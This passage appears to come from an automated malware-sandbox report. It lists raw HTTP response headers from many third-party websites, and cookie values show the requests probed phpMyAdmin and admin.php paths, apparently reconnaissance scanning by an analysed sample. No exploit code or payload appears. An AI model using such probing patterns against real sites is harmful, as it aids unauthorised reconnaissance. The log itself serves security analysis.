yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRalsLdlxH3ESa4hzsLe02sXVHCy2enhsqnwoN5tf+FlCmPe/QkHg89F/wEdJNu+hnHLQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,c2NmS8zFFiMMSZsKYWKS96LADve3hkb6YcfzdP1unZI=,WDMzHiyOL7uW518fW2ByrxYm7Hy0IxbPwWPdSZ00JGIuGGyTjOJT2bBDFj9QbaUIfL/RERtnkwYNR6ehP9dODg==Transfer-Encoding: chunkedVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: 0cd67af5-2a79-49ce-847c-403485db8928via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6EIt7ZeQnMtYW0kfG97wa3S8rmbVAGPFUw3FtRHBMsyQKv2PPk0JOA1ZD7k%2FblTj6ArjikENoh7pX6xCjwiqPxHKduHbq4r1yULLeCGHpt%2BADiDzcrX4oyR3GqRKwOfocAPf%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08ac0b352203-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 94Connection: closeX-Frame-Options: SAMEORIGINCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fL%2Bb%2FQbr6XU2W2tEwXoxd9xz1wgIZXbqv34ZYhb5xpWi%2BYBLi8EV1QrnT%2FNOHmjxDSKgTqQMoPTpHudkhjphcGkM14ek4KBykC8lelxjjfcw2zFkkkDTAjyuKtvgjiUx6psY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08ac6db831e9-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276095; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276095; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522246e7e981acc00a3c35dd0adbd47b5bf%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2FphpMyAdmin%2F%22%3A%5B1703276095%5D%7D; expires=Mon, 25 Dec 2023 20:14:55 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:14:55 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b08abedf39ab3-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.15Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/"X-Frame-Options: SAMEORIGINCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A19IbUcneaJYiNBpdycsK2QAUyFH6BqchZ4vauwPtkyQ7E1oVJF2nGz9SAsSIqB01LNag2yEMxa5ca8r%2BZN1lQ1mQvMnoBHlCI37lNxA9ZNjopsBXqJBlXBf0vcCKjAoVaum"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08ac3f6f7479-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: Apache / ZoneOSConnection: Upgrade, closeLast-Modified: Mon, 23 Oct 2023 21:31:51 GMTETag: "1d7b-60868f3479039"Accept-Ranges: bytesContent-Length: 7547Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: d4f8dfae-35a5-4f0c-b52e-e611999554cevia: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hA8gAFHmZ77NvXMh4YXjXAcM6fxnMb31lpSnBTwx1oWhnWqYYzKgbF6aO0ujo7UXeCpvBFeQTBCbnA2fgR3Y7%2Bl%2F7KkpS2a0FC0Wk7fE23koUbkDdHPP2XeKcL2JoL9fV9Mu2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08b93b2ddab9-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 2929Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276097.5641706370139231077Cache-Control: public,max-age=0,must-revalidateServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:14:57 GMTAge: 3X-Served-By: cache-dfw-kdfw8210153-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqe0L1PnLg6FLWqrGNmqNwAa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaljisb3AquZ75AMu3lSzmWH/bf8RAwRVMHlkGvQMWkFNuMRNRaVhJq43k38tPlVzdpQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nLVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.3.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:14:58 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.3.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:14:58 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:58 GMTConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 2929Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276099.4931709926797312280Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:14:59 GMTX-Served-By: cache-dfw-kdfw8210138-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaljisb3AquZ75AMu3lSzmWH/bf8RAwRVMHlkGvQMWkFNuMRNRaVhJq43k38tPlVzdpQ==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,c2NmS8zFFiMMSZsKYWKS96LADve3hkb6YcfzdP1unZI=,WDMzHiyOL7uW518fW2ByrxYm7Hy0IxbPwWPdSZ00JGIuGGyTjOJT2bBDFj9QbaUIfL/RERtnkwYNR6ehP9dODg==Via: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276099; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276099; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522136395426cb8366aa35bb4bbe9e86218%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2FPhpMyAdmin%2F%22%3A%5B1703276099%5D%7D; expires=Mon, 25 Dec 2023 20:14:59 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:14:59 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b08c52aae6db0-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.15Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Cache-Control: s-maxage=10Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: PHPSESSID=vraklm386fium8pc9dsp24h090; path=/X-Frame-Options: SAMEORIGINCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2qo49HhTrJf4rvmQdn0QL85SrMhZL2uUq7kMqqP2Q1fIOf2it9eB0CsMmtDk0qKjTcI7egvCZkaZp9pWIe%2Be78UG0mXoSdZCQ%2Bw92iH1BSIbA6g9yrEX92pClKtgiAf5xHQb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08c5eaa4743e-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 839b08ca9a25d9e9-MIACF-Cache-Status: HITAge: 6Cache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15Strict-Transport-Security: max-age=31536000Vary: Accept-EncodingContent-Security-Policy: Referrer-Policy: strict-origin-when-cross-originX-Content-Type-Options: nosniffX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-Request-Id: 46617c93-e31b-4477-b018-9c981ec1d827X-Runtime: 0.559898X-Xss-Protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/csp-reporting.cloudflare.com\/cdn-cgi\/script_monitor\/report?m=UfQDWn.ajkXJ2fWo49bCRj81EYS4J2mrGWBCC4R9ZmE-1703276100-1-AQhpyr584vcNOkcN_4I4KuVOd7vZvMHPjmbP6-XyoS93S495ZItmavLvrt3PAFvdEb_x5jMmwYXZmfZXMeW8iKLhsr1jtW-1Jh-uLrg-tPQoyTX4Vu5isVNvPhJkWjy_UySVnrfDjKO0gqxRPqDdZhA2BlJ7x9csLAtI0HcycSQ_"}],"group":"cf-csp-endpoint","max_age":86400}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTServer: Apache / ZoneOSConnection: Upgrade, closeLast-Modified: Mon, 23 Oct 2023 21:31:51 GMTETag: "1d7b-60868f3479039"Accept-Ranges: bytesContent-Length: 7547Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset=utf-8Expires: -1X-Result-Reason: Not RedirectedX-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404X-UA-Compatible: IE=edgeSet-Cookie: dnn_IsMobile=False; path=/; HttpOnlySet-Cookie: __RequestVerificationToken=UbKrbUwTpmRv_u671ztUJ4s7ZyntQM-nS0_diyZEuHxwc5zBXSQIBA2IlWDzBsr8dpcE0g2; path=/; HttpOnlyX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINDate: Fri, 22 Dec 2023 20:15:00 GMTConnection: closeContent-Length: 33332
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()cf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZPAKZIYaAlBkowsarDsCe2PbNWxYeBTu%2B8Pvu9VpJMKdP%2FQMgiyxemmq5aWL3Ajrite9dlVzSu%2FfBdrS5O3dNMgP1ayUxK%2FTXDkCtOd3nhzAEWyB3bBZIm%2BubIu5xFYJcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 839b08cb8b2f31d7-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/"cache-control: no-cache, must-revalidate, max-age=0x-cacheable: yesx-litespeed-cache: hitcontent-length: 105931date: Fri, 22 Dec 2023 20:15:00 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276101.30517092997863620259Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:15:01 GMTX-Served-By: cache-dfw-kdfw8210156-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRalq9Cfwf7LcODof4R64mYJN7tXVe+wUQOXuUxsQ74iKQx719L5qO09GqA9VtpiZlTsw==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,Uh3+FND4gW3xHL7Yw3zy0HOx5fM3NYGU2oh/PYLAjKs=,hUeKicgprlF3Ei9qMBzezHDp2DKwVkOLOSLKHrQkz7w=,WDMzHiyOL7uW518fW2Byr2GuGiStFB9OWrVR4y4nAsbQHalDg5GXgutSG6W0vh+Sw9doegBPDuevU6lQBO5pKA==Transfer-Encoding: chunkedVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()cf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6CnCbxp12JZ07Wp58U5vjUjUb4Sek7QBa6j8CJxThHfNZ0746dtAiY6lRfem3TeCpSwezDjGJrrL7Tzf26h3uIRrfI5ruOQk%2FK9fDZq0XuBgoOW%2F1ZcQx%2FfJbPUi%2FVm5Kg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 839b08d6b93274ae-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.15Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Cache-Control: s-maxage=10Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: PHPSESSID=25m3c3rloum2duanrqh3pfmaop; path=/X-Frame-Options: SAMEORIGINCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BOdxV9aMHb1dCz01w07lS7wlLlSkGAzj9RBDbTSPCACWOdOYXHgBdSMCJrAIdeDMT%2BUwi8xEwYUVZ0yoVF3l2IWHt3F91cbHRU2MsjcAdUxmqjRBa6w6j2uxsKPJK%2Bq1rx4o"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08d6d9beb3df-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276102.41817053227839513697Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:15:02 GMTX-Served-By: cache-dfw-kdfw8210106-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalsst5x+YJsbyLN0Et/H9lhFmAX9i+RxyDcNDiBJksR99Y3Ia0t5PWC66or9SAApZ2g==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,Uh3+FND4gW3xHL7Yw3zy0HOx5fM3NYGU2oh/PYLAjKs=,brHlnRLt/FuujuYg6R3/b/vOHXrUj/LpdoqVq4g5Dks=,WDMzHiyOL7uW518fW2Byr/4LuG63XEniHZO8ZK3qT3KYVyx5DpUh//FRrtiGCQdqtYIDlldA0WB/4YoEaWcTuA==Transfer-Encoding: chunkedVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.3.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:15:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: d8e87367-e72f-434d-90ca-9c4a1b35d990via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1jZYjdRW%2BkZg0vthINl3uAZ1AClIZTiItElDrwl%2FhMzqnoDJ996oGypvWvTPqTakESfh8fWJRaVDtWlY0vCCzzYk6PwEs6K6NO8uA9T0aq%2BBMKSe178TK4VoR8cfMNgCt8wV3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08d938d467bd-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:03 GMTServer: Apache / ZoneOSConnection: Upgrade, closeLast-Modified: Mon, 23 Oct 2023 21:31:51 GMTETag: "1d7b-60868f3479039"Accept-Ranges: bytesContent-Length: 7547Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276103; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276103; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522b711608b10e1bda40f3fe4b817ac430d%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin.php%22%3A%5B1703276103%5D%7D; expires=Mon, 25 Dec 2023 20:15:03 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:03 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b08dafe5131cc-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276103.3091710215704318969Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:15:03 GMTX-Served-By: cache-dfw-kdfw8210021-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: 